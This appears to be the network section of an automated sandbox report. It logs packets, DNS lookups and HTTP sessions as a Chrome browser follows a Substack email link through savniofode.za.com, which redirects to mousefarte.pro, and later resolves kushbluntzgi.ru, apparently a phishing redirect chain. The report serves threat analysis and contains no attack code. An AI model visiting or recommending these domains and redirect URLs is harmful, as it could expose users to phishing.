                                                                                        Oct 2, 2024 17:16:07.279412031 CEST4972480192.168.2.4199.232.210.172
                                                                                        Oct 2, 2024 17:16:07.284961939 CEST8049724199.232.210.172192.168.2.4
                                                                                        Oct 2, 2024 17:16:07.285252094 CEST4972480192.168.2.4199.232.210.172
                                                                                        Oct 2, 2024 17:16:10.567420006 CEST60348443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:16:10.567473888 CEST44360348216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:16:10.567542076 CEST60348443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:16:10.568155050 CEST60348443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:16:10.568164110 CEST44360348216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:16:11.218517065 CEST44360348216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:16:11.219984055 CEST60348443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:16:11.220016003 CEST44360348216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:16:11.220340967 CEST44360348216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:16:11.221966982 CEST60348443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:16:11.222026110 CEST44360348216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:16:11.262620926 CEST60348443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:16:13.584301949 CEST4974380192.168.2.4154.26.158.144
                                                                                        Oct 2, 2024 17:16:13.589968920 CEST8049743154.26.158.144192.168.2.4
                                                                                        Oct 2, 2024 17:16:13.590063095 CEST4974380192.168.2.4154.26.158.144
                                                                                        Oct 2, 2024 17:16:16.726253033 CEST44360346188.114.96.3192.168.2.4
                                                                                        Oct 2, 2024 17:16:16.726329088 CEST44360346188.114.96.3192.168.2.4
                                                                                        Oct 2, 2024 17:16:16.726372957 CEST60346443192.168.2.4188.114.96.3
                                                                                        Oct 2, 2024 17:16:17.470997095 CEST60346443192.168.2.4188.114.96.3
                                                                                        Oct 2, 2024 17:16:17.471031904 CEST44360346188.114.96.3192.168.2.4
                                                                                        Oct 2, 2024 17:16:20.646243095 CEST60349443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:20.646286011 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:20.647352934 CEST60349443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:20.647947073 CEST60349443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:20.647957087 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.125855923 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.126183033 CEST60349443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.126209021 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.126776934 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.127170086 CEST60349443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.127244949 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.127337933 CEST60349443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.139695883 CEST44360348216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.139854908 CEST44360348216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.139991999 CEST60348443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:16:21.171399117 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.258716106 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.258802891 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.258861065 CEST60349443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.259032011 CEST60349443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.259052992 CEST4436034935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.259299994 CEST60348443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:16:21.259340048 CEST44360348216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.259609938 CEST60350443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.259635925 CEST4436035035.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.259701967 CEST60350443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.259917974 CEST60350443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.259928942 CEST4436035035.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.718446970 CEST4436035035.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.718806028 CEST60350443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.718822956 CEST4436035035.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.719506979 CEST4436035035.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.719985962 CEST60350443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.720046043 CEST4436035035.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.720366955 CEST60350443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.720469952 CEST60350443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.720474958 CEST4436035035.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.846250057 CEST4436035035.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.846442938 CEST4436035035.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:21.846529007 CEST60350443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.846802950 CEST60350443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:16:21.846818924 CEST4436035035.190.80.1192.168.2.4
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 2, 2024 17:15:07.287081003 CEST53524731.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:07.288106918 CEST53620821.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:08.333543062 CEST53608581.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:08.751081944 CEST5933653192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:08.751209021 CEST5752553192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:10.516422033 CEST5627753192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:10.516756058 CEST6425953192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:10.523379087 CEST53562771.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:10.524030924 CEST53642591.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:10.533754110 CEST4924453192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:10.534020901 CEST5721853192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:10.544147968 CEST53492441.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:10.702223063 CEST53572181.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:12.593527079 CEST5551653192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:12.593986988 CEST5820353192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:13.098267078 CEST53555161.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:13.102863073 CEST53582031.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:14.359909058 CEST6171953192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:14.360265970 CEST5662953192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:14.381803036 CEST53617191.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:14.390865088 CEST53566291.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.309168100 CEST5110353192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:15.310681105 CEST5321253192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:15.316152096 CEST53511031.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:15.318074942 CEST53532121.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.176350117 CEST6106353192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:17.176721096 CEST6161853192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:17.183518887 CEST53616181.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.184765100 CEST53610631.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.229837894 CEST5632153192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:17.230043888 CEST5803553192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:17.237739086 CEST53580351.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:17.238020897 CEST53563211.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:18.692745924 CEST138138192.168.2.4192.168.2.255
                                                                                        Oct 2, 2024 17:15:20.639113903 CEST5018053192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:20.640232086 CEST6396253192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:20.645847082 CEST53501801.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.648648024 CEST53639621.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.752307892 CEST53646641.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:29.802099943 CEST53567751.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:40.114830017 CEST6124453192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:40.115438938 CEST6412553192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:40.121444941 CEST53612441.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:40.122190952 CEST53641251.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:41.012048006 CEST5779353192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:41.012253046 CEST6299853192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:41.019130945 CEST53629981.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:41.019174099 CEST53577931.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:41.112448931 CEST5033753192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:41.112602949 CEST6441353192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:41.203984022 CEST53503371.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:41.241713047 CEST53644131.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:45.296129942 CEST5501753192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:45.296597004 CEST5173553192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:45.303874016 CEST53550171.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:45.303968906 CEST53517351.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:45.357794046 CEST5913653192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:45.358247995 CEST5034153192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:45.481764078 CEST53503411.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:45.619312048 CEST53591361.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:46.373513937 CEST6524553192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:46.373765945 CEST6408853192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:46.380871058 CEST53652451.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:46.381119013 CEST53640881.1.1.1192.168.2.4
                                                                                        Oct 2, 2024 17:16:06.383703947 CEST53544541.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                        Oct 2, 2024 17:15:10.702296019 CEST192.168.2.41.1.1.1c279(Port unreachable)Destination Unreachable
                                                                                        Oct 2, 2024 17:15:14.390955925 CEST192.168.2.41.1.1.1c278(Port unreachable)Destination Unreachable
                                                                                        Oct 2, 2024 17:15:41.241785049 CEST192.168.2.41.1.1.1c279(Port unreachable)Destination Unreachable
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 2, 2024 17:15:08.751081944 CEST192.168.2.41.1.1.10xd2feStandard query (0)tqaun.us12.list-manage.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:08.751209021 CEST192.168.2.41.1.1.10xfbf9Standard query (0)tqaun.us12.list-manage.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:10.516422033 CEST192.168.2.41.1.1.10xc3a3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:10.516756058 CEST192.168.2.41.1.1.10xe0a6Standard query (0)www.google.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:10.533754110 CEST192.168.2.41.1.1.10xdf86Standard query (0)link.sbstck.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:10.534020901 CEST192.168.2.41.1.1.10xbb23Standard query (0)link.sbstck.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:12.593527079 CEST192.168.2.41.1.1.10x4896Standard query (0)savniofode.za.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:12.593986988 CEST192.168.2.41.1.1.10x9864Standard query (0)savniofode.za.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:14.359909058 CEST192.168.2.41.1.1.10x6bfaStandard query (0)mousefarte.proA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:14.360265970 CEST192.168.2.41.1.1.10x3699Standard query (0)mousefarte.pro65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:15.309168100 CEST192.168.2.41.1.1.10x6f1cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:15.310681105 CEST192.168.2.41.1.1.10xf357Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.176350117 CEST192.168.2.41.1.1.10xeb9fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.176721096 CEST192.168.2.41.1.1.10x9bfeStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.229837894 CEST192.168.2.41.1.1.10xfbddStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.230043888 CEST192.168.2.41.1.1.10x9298Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:20.639113903 CEST192.168.2.41.1.1.10x9c17Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:20.640232086 CEST192.168.2.41.1.1.10x87e5Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:40.114830017 CEST192.168.2.41.1.1.10x3df8Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:40.115438938 CEST192.168.2.41.1.1.10xd482Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.012048006 CEST192.168.2.41.1.1.10x333eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.012253046 CEST192.168.2.41.1.1.10x2394Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.112448931 CEST192.168.2.41.1.1.10x8cdeStandard query (0)kushbluntzgi.ruA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.112602949 CEST192.168.2.41.1.1.10x5b10Standard query (0)kushbluntzgi.ru65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.296129942 CEST192.168.2.41.1.1.10x10e8Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.296597004 CEST192.168.2.41.1.1.10xa663Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.357794046 CEST192.168.2.41.1.1.10x6d94Standard query (0)kushbluntzgi.ruA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.358247995 CEST192.168.2.41.1.1.10x5e61Standard query (0)kushbluntzgi.ru65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:46.373513937 CEST192.168.2.41.1.1.10x3387Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:46.373765945 CEST192.168.2.41.1.1.10xfd75Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 2, 2024 17:15:08.768485069 CEST1.1.1.1192.168.2.40xfbf9No error (0)tqaun.us12.list-manage.comswc.list-manage.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:08.790091991 CEST1.1.1.1192.168.2.40xd2feNo error (0)tqaun.us12.list-manage.comswc.list-manage.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:10.523379087 CEST1.1.1.1192.168.2.40xc3a3No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:10.524030924 CEST1.1.1.1192.168.2.40xe0a6No error (0)www.google.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:10.544147968 CEST1.1.1.1192.168.2.40xdf86No error (0)link.sbstck.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:10.544147968 CEST1.1.1.1192.168.2.40xdf86No error (0)link.sbstck.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:10.702223063 CEST1.1.1.1192.168.2.40xbb23No error (0)link.sbstck.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:13.098267078 CEST1.1.1.1192.168.2.40x4896No error (0)savniofode.za.com154.26.158.144A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:14.381803036 CEST1.1.1.1192.168.2.40x6bfaNo error (0)mousefarte.pro188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:14.381803036 CEST1.1.1.1192.168.2.40x6bfaNo error (0)mousefarte.pro188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:14.390865088 CEST1.1.1.1192.168.2.40x3699No error (0)mousefarte.pro65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:15.316152096 CEST1.1.1.1192.168.2.40x6f1cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:15.316152096 CEST1.1.1.1192.168.2.40x6f1cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:15.318074942 CEST1.1.1.1192.168.2.40xf357No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.183518887 CEST1.1.1.1192.168.2.40x9bfeNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.184765100 CEST1.1.1.1192.168.2.40xeb9fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.184765100 CEST1.1.1.1192.168.2.40xeb9fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.237739086 CEST1.1.1.1192.168.2.40x9298No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.238020897 CEST1.1.1.1192.168.2.40xfbddNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:17.238020897 CEST1.1.1.1192.168.2.40xfbddNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:20.645847082 CEST1.1.1.1192.168.2.40x9c17No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:23.681531906 CEST1.1.1.1192.168.2.40xb34aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:23.681531906 CEST1.1.1.1192.168.2.40xb34aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:40.121444941 CEST1.1.1.1192.168.2.40x3df8No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:40.121444941 CEST1.1.1.1192.168.2.40x3df8No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:40.122190952 CEST1.1.1.1192.168.2.40xd482No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.019130945 CEST1.1.1.1192.168.2.40x2394No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.019174099 CEST1.1.1.1192.168.2.40x333eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.019174099 CEST1.1.1.1192.168.2.40x333eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.203984022 CEST1.1.1.1192.168.2.40x8cdeNo error (0)kushbluntzgi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.203984022 CEST1.1.1.1192.168.2.40x8cdeNo error (0)kushbluntzgi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:41.241713047 CEST1.1.1.1192.168.2.40x5b10No error (0)kushbluntzgi.ru65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.303874016 CEST1.1.1.1192.168.2.40x10e8No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.303874016 CEST1.1.1.1192.168.2.40x10e8No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.303874016 CEST1.1.1.1192.168.2.40x10e8No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.303874016 CEST1.1.1.1192.168.2.40x10e8No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.481764078 CEST1.1.1.1192.168.2.40x5e61No error (0)kushbluntzgi.ru65IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.619312048 CEST1.1.1.1192.168.2.40x6d94No error (0)kushbluntzgi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:45.619312048 CEST1.1.1.1192.168.2.40x6d94No error (0)kushbluntzgi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:46.380871058 CEST1.1.1.1192.168.2.40x3387No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:46.380871058 CEST1.1.1.1192.168.2.40x3387No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:46.380871058 CEST1.1.1.1192.168.2.40x3387No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                        Oct 2, 2024 17:15:46.380871058 CEST1.1.1.1192.168.2.40x3387No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                        • link.sbstck.com
                                                                                        • fs.microsoft.com
                                                                                        • mousefarte.pro
                                                                                        • https:
                                                                                          • challenges.cloudflare.com
                                                                                          • cdnjs.cloudflare.com
                                                                                          • kushbluntzgi.ru
                                                                                          • code.jquery.com
                                                                                        • a.nel.cloudflare.com
                                                                                        • savniofode.za.com
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449742154.26.158.144803592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 2, 2024 17:15:13.112488031 CEST469OUTGET /?utm_source=substack&utm_medium=email HTTP/1.1
                                                                                        Host: savniofode.za.com
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Oct 2, 2024 17:15:14.007047892 CEST565INHTTP/1.1 301 Moved Permanently
                                                                                        Date: Wed, 02 Oct 2024 15:15:13 GMT
                                                                                        Server: Apache
                                                                                        Location: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email
                                                                                        Content-Length: 278
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 6f 75 73 65 66 61 72 74 65 2e 70 72 6f 2f 34 70 41 74 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 73 75 62 73 74 61 63 6b 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 65 6d 61 69 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mousefarte.pro/4pAtm/?utm_source=substack&amp;utm_medium=email">here</a>.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449743154.26.158.144803592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 2, 2024 17:15:58.123544931 CEST6OUTData Raw: 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449740188.114.96.34433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:11 UTC769OUTGET /redirect/cba7f617-bad8-4206-a765-e1d0a6aa1814?j=eyJ1IjoiNDltdXZ6In0.CxolcWPhPGrBgw3rA0jd5lscc71sjQLfIOZNSPA48EY HTTP/1.1
                                                                                        Host: link.sbstck.com
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:11 UTC1260INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:11 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
